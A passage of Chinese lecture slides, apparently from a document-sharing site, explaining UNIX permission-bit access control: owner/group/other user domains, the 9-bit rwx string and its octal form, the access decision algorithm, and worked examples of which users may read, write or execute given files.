數(shù)字位串:長(zhǎng)度為3的二進(jìn)制位。字符串:長(zhǎng)度為3。數(shù)字:1個(gè)八進(jìn)制數(shù)。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制用戶劃分的三分法屬主:文件的擁有者。一個(gè)文件的屬主是唯一的。屬組:屬主的首選用戶組。一個(gè)文件的屬組是唯一的。其余:除屬主和屬組之外的用戶的全體。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制三分法確定的用戶域?qū)僦饔颍簩僦饔脩舻募?。該域只含一個(gè)用戶。屬組域:屬組中除屬主外的所有用戶的集合。該域可含多個(gè)用戶。其余域:用戶全集減去屬主域和屬組域后剩下的部分。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制三分法用戶域示例A:屬主域;B:屬組域;C:其余域。A、B、C不相交。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制基本訪問(wèn)控制權(quán)限模式描述f(文件,用戶群)
權(quán)限體用戶群:屬主用戶+屬組用戶+其余用戶。權(quán)限體:屬主權(quán)限+屬組權(quán)限+其余權(quán)限。權(quán)限:讀+寫+執(zhí)行。權(quán)限體新位串
新字符串
新數(shù)字新位串:長(zhǎng)度為9位的二進(jìn)制位。新字符串:長(zhǎng)度為9個(gè)字符。新數(shù)字:3個(gè)八進(jìn)制數(shù)。例:111101001----rwxr-x--x----7515.1基于權(quán)限位的訪問(wèn)控制機(jī)制基本訪問(wèn)控制判定算法任務(wù):判斷用戶U可否對(duì)文件F執(zhí)行a操作(a是r、w或x)?設(shè):F的屬主和屬組分別為Uo和Go。當(dāng)U等于Uo時(shí),如果F的左3權(quán)限位串中與a對(duì)應(yīng)的位為1,則允許執(zhí)行操作,否則,不允許執(zhí)行操作,判定結(jié)束。當(dāng)Go是U的屬組時(shí),如果F的中3權(quán)限位串中與a對(duì)應(yīng)的位為1,則允許執(zhí)行操作,否則,不允許執(zhí)行操作,判定結(jié)束。如果F的右3權(quán)限位串中與a對(duì)應(yīng)的位為1,則允許執(zhí)行操作,否則,不允許執(zhí)行操作。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制例5.4—訪問(wèn)權(quán)限判定設(shè)在某UNIX操作系統(tǒng)中,部分用戶組的配置信息如下:grp1:x:300:usr1,usr2,usr3,usr4grp2:x:301:usr5,usr6,usr7,usr8,usr9系統(tǒng)中部分文件的權(quán)限配置信息如下:rw-r-x--x usr1 grp1 ......File1r---w---x usr5 grp2 ......File2請(qǐng)問(wèn),用戶usr1、usr2和usr5可以對(duì)文件file1執(zhí)行什么操作?用戶usr6可以對(duì)文件file2執(zhí)行什么操作?5.1基于權(quán)限位的訪問(wèn)控制機(jī)制例5.4—訪問(wèn)權(quán)限判定設(shè)在某UNIX操作系統(tǒng)中,部分用戶組的配置信息如下:grp1:x:300:usr1,usr2,usr3,usr4grp2:x:301:usr5,usr6,usr7,usr8,usr9系統(tǒng)中部分文件的權(quán)限配置信息如下:rw-r-x--x usr1 grp1 ......File1r---w---x usr5 grp2 ......File2請(qǐng)問(wèn),用戶usr1、usr2和usr5可以對(duì)文件file1執(zhí)行什么操作?用戶usr6可以對(duì)文件file2執(zhí)行什么操作?可對(duì)file1的操作:usr1—屬主—讀和寫;usr2—屬組—讀和執(zhí)行;usr5—其余—執(zhí)行??蓪?duì)file2的操作:usr6—屬組—寫。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制例5.5—關(guān)于屬主權(quán)限的考慮設(shè)在某UNIX操作系統(tǒng)中,自主訪問(wèn)控制機(jī)制的部分相關(guān)文件配置信息如下:r--r--r-- usr5 grp2 ......File3請(qǐng)問(wèn),用戶usr5是否有可能對(duì)文件file3進(jìn)行寫操作?5.1基于權(quán)限位的訪問(wèn)控制機(jī)制例5.5—關(guān)于屬主權(quán)限的考慮設(shè)在某UNIX操作系統(tǒng)中,自主訪問(wèn)控制機(jī)制的部分相關(guān)文件配置信息如下:r--r--r-- usr5 grp2 ......File3請(qǐng)問(wèn),用戶usr5是否有可能對(duì)文件file3進(jìn)行寫操作?表面上看,usr5對(duì)file3無(wú)寫權(quán)限。但是,usr5是file3的屬主,根據(jù)自主訪問(wèn)控制性質(zhì),他有權(quán)修改file3的權(quán)限配置,如改為:rw-r--r-- usr5 grp2 ......File3因而,usr5有可能對(duì)file3執(zhí)行寫操作。5.1基于權(quán)限位的訪問(wèn)控制機(jī)制5.2訪問(wèn)控制的進(jìn)程實(shí)施機(jī)制進(jìn)程與文件和用戶的關(guān)系進(jìn)程P是用戶Up的化身進(jìn)程P的行為邏輯由文件F確定進(jìn)程P對(duì)文件filex的訪問(wèn)權(quán)限如何確定?相關(guān)性:用戶Up對(duì)文件filex的訪問(wèn)權(quán)限?用戶Uf對(duì)文件filex的訪問(wèn)權(quán)限?5.2訪問(wèn)控制的進(jìn)程實(shí)施機(jī)制進(jìn)程到文件用戶域的映射已知:f(文件,用戶群)
權(quán)限體亦即:f(文件,用戶域)權(quán)限設(shè)想:g(進(jìn)程)用戶域應(yīng)有:f(文件,g(進(jìn)程))權(quán)限所以:只要把進(jìn)程映射到文件對(duì)應(yīng)的用戶域中,就可以根據(jù)用戶域?qū)ξ募脑L問(wèn)權(quán)限,確定進(jìn)程對(duì)文件的訪問(wèn)權(quán)限。5.2訪問(wèn)控制的進(jìn)程實(shí)施機(jī)制方案5.7—判定進(jìn)程的訪問(wèn)權(quán)問(wèn)題:進(jìn)程P是否擁有對(duì)文件F的訪問(wèn)權(quán)限y?假設(shè):給進(jìn)程P分配用戶標(biāo)識(shí)和組標(biāo)識(shí)Iup和Igp,文件F的屬主、屬組和權(quán)限位串分別為Iuf、Igf和S1S2S3。當(dāng)Iup等于Iuf時(shí),檢查S1中是否有y權(quán)限,有則允許訪問(wèn),否則,不允許訪問(wèn),結(jié)束判定;當(dāng)Igp等于Igf時(shí),檢查S2中是否有y權(quán)限,有則允許訪問(wèn),否則,不允許訪問(wèn),結(jié)束判定;
溫馨提示
- 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
- 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
- 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
- 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
- 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。
最新文檔
- 光伏發(fā)電項(xiàng)目屋頂租賃合同
- 廣西小學(xué)教學(xué)樓合同協(xié)議書
- 海外打工合同書
- 合同到期聲明范本
- 2024年廣州客運(yùn)資格證應(yīng)用能力試題及答案詳解
- 2024對(duì)外建筑工程承包合同
- 2024家庭農(nóng)場(chǎng)土地租賃合同
- 深圳大學(xué)《自然辯證法》2021-2022學(xué)年第一學(xué)期期末試卷
- 魚肉購(gòu)銷合同(2篇)
- 種植松樹協(xié)議書(2篇)
- 第六章-冷凍真空干燥技術(shù)-wang
- 大學(xué)生職業(yè)生涯規(guī)劃成長(zhǎng)賽道
- 建設(shè)項(xiàng)目設(shè)計(jì)管理方案
- 2024年屆海南航空控股股份有限公司招聘筆試參考題庫(kù)含答案解析
- 前程無(wú)憂在線測(cè)試題庫(kù)及答案行測(cè)
- 《軍事理論》課程標(biāo)準(zhǔn)
- 倉(cāng)庫(kù)貨物條碼管理培訓(xùn)
- 第六章-中國(guó)早期社會(huì)學(xué)中的社區(qū)學(xué)派-《中國(guó)社會(huì)學(xué)史》必備
- 太陽(yáng)能發(fā)電技術(shù)在航天與航空領(lǐng)域的應(yīng)用
- 大學(xué)生預(yù)防猝死知識(shí)講座
- (2)反壟斷法(字向東)
評(píng)論
0/150
提交評(píng)論